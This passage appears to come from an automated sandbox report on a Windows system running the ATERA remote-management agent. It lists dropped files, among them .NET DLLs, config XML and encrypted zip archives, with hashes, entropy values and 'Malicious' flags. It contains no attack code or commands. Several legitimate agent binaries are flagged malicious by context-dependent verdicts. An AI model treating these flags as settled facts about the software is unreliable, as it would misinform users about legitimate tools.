                                                                                                                                                                                                                                                                                                                                  SHA-512:DBCAEDDDC4D99586F1E04FDA97E1C706FBC6BE7BB766E0FE73ADDAD3116517010A3C1C92D7F54D71533B4C4459631966D8D0CF370ECF1F789F7D25FCB2F5A64E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0032352150787975
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YhKSLJf2B4VXxrJQNiiOhHJtFHHTOVWTReTL14n:Y5fVXrciiAJHKVWde/Kn
                                                                                                                                                                                                                                                                                                                                  MD5:B8AB4FC8BF110CC525A3E8B1D8EC0D2A
                                                                                                                                                                                                                                                                                                                                  SHA1:8F349F2422E951C336C49F16582F5431B07BFFE6
                                                                                                                                                                                                                                                                                                                                  SHA-256:72B44AD32B6DC9510D3BE0D3DD8AA8A65C6F3648B792313FE07686D4CB59BCC6
                                                                                                                                                                                                                                                                                                                                  SHA-512:96ED32928270DF46B5F393CEAAF0CF347AC600C279443962EF0576010EEBF4226B26FD66404CC1F1CC9A94D89F583DE58310E7C209EB4E566EBA2F8BCFE12FFD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:{"DownloadedAt":"2024-10-31T15:13:28.4439208-04:00","Hash":"8TVvf703UCtSnZvNZD+3qw=="}
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):88
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.9257056310153855
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:nVMz3VfS4EE6LGKWqKRLXsmfWoVUgXAQJ:Vkf7lKWqKRLX/qK
                                                                                                                                                                                                                                                                                                                                  MD5:E8261AA9F4C9B7A12E987F461FFEC79F
                                                                                                                                                                                                                                                                                                                                  SHA1:22EADC50EFDEE81037298CAF27446E4A20FE20E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:13D74DE0F9245118E968869AFB46EC5D026CF930800ED4ECAB017B8790F7224F
                                                                                                                                                                                                                                                                                                                                  SHA-512:0BF595FBA1A1E01AC1863F115581DB428AFBFC71EC414CAD58F04CF989B60A3001A4E6C84EBBD4291A6C7C01AE2A71D7319F40377F384B02C7F871B1CD1EC002
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..30/10/2024 18:30:31 Downloading installation to: C:\Windows\TEMP\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):662057
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999353949499206
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:BBRK7zkUGwDTrw2rTX8HkklhCrdD2TpNwjaIj2nW7+7nZh2bdb:BBRyNJDw2rTX8Hk5rZ+IapZYV
                                                                                                                                                                                                                                                                                                                                  MD5:7895698867D1AD33934A8553B4806DC5
                                                                                                                                                                                                                                                                                                                                  SHA1:32704DF55DEAFF9BF0B4EE0B887541856578938B
                                                                                                                                                                                                                                                                                                                                  SHA-256:EF5854B5E800A534A08C083D4A3956DFC0A474FF540CAE9BF0A9077A213B2FF9
                                                                                                                                                                                                                                                                                                                                  SHA-512:20337093DDC5322C4B96C7BF26F1A0B966FAFDE70A96F7E9B5E9D36ACAC7D862BD2A50CAE9A63731B23904A9256C94CD3BB4E19768130580511EC4C408536A58
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.276903482604295
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:MsK/GcLpkOGiHuAQ+INjkfEQ3Tnz8AnTqLx3OEpYi60nN:M/zpqiOAbINwfEQDz8QIx3v76GN
                                                                                                                                                                                                                                                                                                                                  MD5:C0F02EAA3EB28659D8F1BCBA8DE48479
                                                                                                                                                                                                                                                                                                                                  SHA1:5BE3C69E3F46DAFF4967484A09EB8C4A1F4A7F0F
                                                                                                                                                                                                                                                                                                                                  SHA-256:6BEFB51A6639CAE7E25570F5259F7B1F2D9B9B6539177D64D2ED8BE50DDE6268
                                                                                                                                                                                                                                                                                                                                  SHA-512:47B536FA628608A58F6F382BBC99911EEFF706BECFAF4B1C5FF904CA768917F40C2E916BA5A31992DF0335BA5A57755F047F70AAFAAC414FC655DA0CD6F95E34
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):923
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.156246271896278
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Jds4F7k1hOXrRT2/2E10PT2/+w0E1UrPT2/+7Trln:3ss757Rkqk+wik+7Nn
                                                                                                                                                                                                                                                                                                                                  MD5:D6FCBCF9C6ABC2F051772E7A7D5EDFD5
                                                                                                                                                                                                                                                                                                                                  SHA1:33D9962BCC42F021A7CEADF3D1C613B4643C66F6
                                                                                                                                                                                                                                                                                                                                  SHA-256:F523D40AE141AA8899B053D77117FCF50639708757AD4A050F3A11E8582A894A
                                                                                                                                                                                                                                                                                                                                  SHA-512:07DA40F1C43A1E35582ADE5DBBAEB47EC2922C42241BD4B950EFA76407597CF838338E27F3F5197E02F5209B27542207BEDBA9B85681955E3C326C95C1F5AC22
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />...</startup>...<runtime>....<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.....<dependentAssembly>......<assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.....</dependentAssembly>.....<dependentAssembly>......<assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.....</dependentAssembly>.....<dependentAssembly>......<assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />......<bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.....</dependentAssembly>....</assemblyBinding>...</runtime>..</configuration>
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhXSnn:WBe
                                                                                                                                                                                                                                                                                                                                  MD5:39DF0BC698F203A4FEF18A68A7B0EADC
                                                                                                                                                                                                                                                                                                                                  SHA1:0EA8D556AF659E0C8D6406B5B3E7E56EE6A10188
                                                                                                                                                                                                                                                                                                                                  SHA-256:F8DD3CEC3612C302B45EA9539002625E58E528A5CB68B4B0E6C3C2A378122C1A
                                                                                                                                                                                                                                                                                                                                  SHA-512:E6FF51381293BFD52EAE39B9868968A76D94BC993BAD5566C532A30E5EE5FE121C2F5B8EAED7ACEE59E3F6B8C1B3BEBB53B07B46F572F3498B1800B0DEAC128D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=27.6
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):112168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1656661918593905
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:f6sg/V5pWyNoWSh7Wyt1M2MAlb7UkN9/EVYFfbQgL/BR18xRUmHkEWpkGI76jC:fI8/Mmb+afbQgL/f182iGIJ
                                                                                                                                                                                                                                                                                                                                  MD5:6C7379E62BB26D3368555BDD5CD83E88
                                                                                                                                                                                                                                                                                                                                  SHA1:A406C91F1FC52525244B9E9EDC2A2188154A6109
                                                                                                                                                                                                                                                                                                                                  SHA-256:B87F055078EC819250F49ABAF196D42ECD994070BE5C14A9A157E783BCDA39B4
                                                                                                                                                                                                                                                                                                                                  SHA-512:E3FB4CE3826F39F8949EEFC147D7D07F2DB0265D421710A0058DEBBA9EFF21294563FDBE62020F42649E7E4A98CF63398C7F1D14E66712C5EB8EDA1D0C4CB5D6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):38952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.310423924344811
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:LINsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wg5t:MNsii6v/HS0+OJd5gpKm76tg5t
                                                                                                                                                                                                                                                                                                                                  MD5:75A85EBD35C909B1AE34FC3F37500E53
                                                                                                                                                                                                                                                                                                                                  SHA1:B7527367D4860841EA922589D66B928B27FE53CE
                                                                                                                                                                                                                                                                                                                                  SHA-256:D3C5160AB184F88A1CCF47846AAF8402200FCCD509B31A73B8AA19F529AB14FA
                                                                                                                                                                                                                                                                                                                                  SHA-512:96F4B49F8FA28A20CA893D69D7432F07D516C15C0FBCFE83891F832C15D1883518487410165206D481CDAB48C130257C073AD626E6F318F2DE31A441443CDACA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.853907358895156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:w1c5uLPirbW34/wUNyb8E9VF6IYijSJIVxRFTNUJyXo:w1cKmENUEpYi601U4Xo
                                                                                                                                                                                                                                                                                                                                  MD5:5F6C8C110454CFAC8B8EE908A953868F
                                                                                                                                                                                                                                                                                                                                  SHA1:C6A2B66C840C0F9324AA255AC8D6E440B2F2F3FF
                                                                                                                                                                                                                                                                                                                                  SHA-256:9E203ED95084AB3B3F3C199712E9C76DB4D9FB3AA5D6BF004ADA9FEE328B6AD5
                                                                                                                                                                                                                                                                                                                                  SHA-512:F682720C6BE19E2B1CDE3C4A03D7D1D7211A3789127F13C1C283F838B8045EAEC4B5C570DCB07ED054BAA5C23C839836D13D0DC8F00205B34862A185C581F537
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1017
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.00184675687532
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JdArdEtPF7NhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3Ar+z7O7Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                                                                  MD5:8A743B2BAC31EB00D4BDA0EBC8DF160B
                                                                                                                                                                                                                                                                                                                                  SHA1:5564F6A8F02973D040E8409E21B2A18ECA2CA8EB
                                                                                                                                                                                                                                                                                                                                  SHA-256:31A69A6D9423CE1BCF98F5281DEB1B8F537D95609CDFA03AF9A41CBF00D1243A
                                                                                                                                                                                                                                                                                                                                  SHA-512:9F14C687EF076CEB4B903E2C5803DCB9401BDEADC00B0E090765E67B54E9BEEC733B087609D76C605C8485C7E446E8DB3A0D8AA3E17C969FC155F069070BB543
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>.
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):398888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.134219330910627
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:YjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvl:Y+e55LgIkTmyAAfTnMLvl
                                                                                                                                                                                                                                                                                                                                  MD5:E8815AB9546D6E490D2846504034579F
                                                                                                                                                                                                                                                                                                                                  SHA1:0555312ED1C700ECBC37BFCDE1140FEEE906FA0A
                                                                                                                                                                                                                                                                                                                                  SHA-256:4A48F3331F1CA29F3CD57658716A39837FCE120999CEF8E44B71FB885DBA861F
                                                                                                                                                                                                                                                                                                                                  SHA-512:67DF21BA4AEA22ED63EA7CB1E9E670815E88262E324D340B2BE7DD5361F770B12064F56016F1CD41024F6846E84B3EC0D4C61A5EE71FDF11879A7E714B0169B3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960700768144483
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:xBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUQ:xBjk38WuBcAbwoA/BkjSHXP36RMGh
                                                                                                                                                                                                                                                                                                                                  MD5:C1ED198D6A5A3B91803AE06CAD22C3F1
                                                                                                                                                                                                                                                                                                                                  SHA1:CC59677BE3ECFD80EDF5D1CF2EB90742092111A2
                                                                                                                                                                                                                                                                                                                                  SHA-256:D46156C73123F9E5F3008C58461EB19DE5935A21FD33366C4AF02682AB42C8F4
                                                                                                                                                                                                                                                                                                                                  SHA-512:26CDBA17B6546F8E9D43243EB708FCCA5DA8EB19AC164695DADB944F71CFFEEC908E9F269FE90F0163B332164D725CF0494AAB165677B588B188FFEB888D964B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18472
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.705325491847164
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:dqHstMuvMK2tFNyb8E9VF6IYijSJIVx8s6:dXMukKeBEpYi60y
                                                                                                                                                                                                                                                                                                                                  MD5:21A4630C5A4D88DAA5C57E45FFCA3A7A
                                                                                                                                                                                                                                                                                                                                  SHA1:CD8D4B45D46F10BE5490D9A14D78C2F1B65288C6
                                                                                                                                                                                                                                                                                                                                  SHA-256:4869FC8C272289D814DD591294C9189B4D937DA08EF899D47D79D8D74557977B
                                                                                                                                                                                                                                                                                                                                  SHA-512:5B8650D6121AF5074EC65B59EE2067AC013AAB3E888FB1777FF6533F9125C453E9CEC24843468DD6C4030807CA988F9FD0E338AC54BA391C53D2F484BC4310E1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):975
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.005145470654642
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JdsHPF7NhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3st7O7Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                                                                  MD5:DB02B24A7803C99F651940FECBE6E283
                                                                                                                                                                                                                                                                                                                                  SHA1:34EF3032B61E369535658D72BCE1E9908888EA0A
                                                                                                                                                                                                                                                                                                                                  SHA-256:207C4D442FACD06379217DD915D85D926DD622E72F6DB5814753FD2E5F8D0048
                                                                                                                                                                                                                                                                                                                                  SHA-512:9C76B6E3DBB34E2729F5C0E49A2A195C87AE11916A4479676AD09EE2C182DD83F87E826BA39DDF410B99A82EF1053571AA7A1E97426D396794C6E25E066C3849
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>.. <supportedRuntime version="v4.0" />.....</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.1.1" newVersion="4.0.1.1" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22056
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.676761287031738
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Zy/fjFwUI/KQyVvKdDhG6ISDFWvYW8af0Nyb8E9VF6IYijSJIVxOqgzXU:ZuhMaVmzDC6k0EpYi60gk
                                                                                                                                                                                                                                                                                                                                  MD5:66084E1A2EF0F7EE9C19238C7F6D6DFB
                                                                                                                                                                                                                                                                                                                                  SHA1:0DE978530731CDEF53D0302D7CA32A5C56E3856C
                                                                                                                                                                                                                                                                                                                                  SHA-256:A1078DD6A3A1AB3FD28EB1B5EC10BB126C14807F3DBDA81650F75AC79AEE7E46
                                                                                                                                                                                                                                                                                                                                  SHA-512:97A4A18878BF64C20869F4A1A60CBF2A12D57413FB197C15A547CE5B1BCCA31FE36D11A4F5B300F23179C8B153B76E3C73D311545C67E6694FECEA706BA6914E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):64040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.266538479286202
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:HYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607zPk:HKC9niwOepJ6TJPeb6NIUFg76Kzs
                                                                                                                                                                                                                                                                                                                                  MD5:6D09B622635ED02D52600299F6102645
                                                                                                                                                                                                                                                                                                                                  SHA1:BFE508CD7D9F302E1A5C26184A46B752F64CCECC
                                                                                                                                                                                                                                                                                                                                  SHA-256:4E27A624A06023843D8369ABAC1E042845135AF278486FD86C3680928AECF66D
                                                                                                                                                                                                                                                                                                                                  SHA-512:6C4197E00E0C10ED1FF8E073A9D080C9C913A4CF2CB1B80F047B76F788059604F60F7D750A6EE8E66C65AB02BB847E4CBF737397B9E2C849A633674DAAF9AE96
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.178769713478036
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:CP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IJHF:Ch0qjC5RMOHO420kN1+
                                                                                                                                                                                                                                                                                                                                  MD5:825B1939391B03517732A72AA489B50B
                                                                                                                                                                                                                                                                                                                                  SHA1:B8B1E37E60C68E7C73D42A7C532E507DAE1B1D4C
                                                                                                                                                                                                                                                                                                                                  SHA-256:B1A7D040D2CFB5DF692BDE7D5C2CEEDE266D9A7B31804658FFBDAAA147E36C39
                                                                                                                                                                                                                                                                                                                                  SHA-512:74C71265D4AA0FE2B409DB33CE40F83D1208F225808AF780DDE72E02ABE1C9BF431630BB9CF2D46E097400DED78D6B9456B41643EE0C5B5C4C3649C5B30B0241
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.634307366985014
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:2TO9dQWXYW8a6gNyb8E9VF6IYijSJIVxJF08V83Y:2Cn6xYEpYi60k8yI
                                                                                                                                                                                                                                                                                                                                  MD5:72823338F267AE2E3B0ED7AB100DE427
                                                                                                                                                                                                                                                                                                                                  SHA1:C03CC9B7F7B1C2895A8568A3F579F154BADE75B3
                                                                                                                                                                                                                                                                                                                                  SHA-256:C29D08E8169DA52E8027AC9755CE99D81B2882B8A1F55648BBED8DB2A85B2BBC
                                                                                                                                                                                                                                                                                                                                  SHA-512:784F69300FD79F62556D473BD37A21ECFB743B5D063CF49299B35101A8399FC2A6F208D3A656C261180DA2558AC5FC93E397131BA0F9C1A2AE3B410328684B52
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3265279
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999883690937835
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:Ll701FdcH/laRbTaZtTtjpEkGXPIzdti3:l0DdOdaR/aZtT5GXCdk
                                                                                                                                                                                                                                                                                                                                  MD5:1F6BD7C304C2DD82E98770A1CC016079
                                                                                                                                                                                                                                                                                                                                  SHA1:6DE8817529684D89A13D489A4ABCBB5C43EFCF54
                                                                                                                                                                                                                                                                                                                                  SHA-256:363E92B1472C84182A11EAC15DA2A9FB7AD84F827B3F0908FD427B1F13D3F044
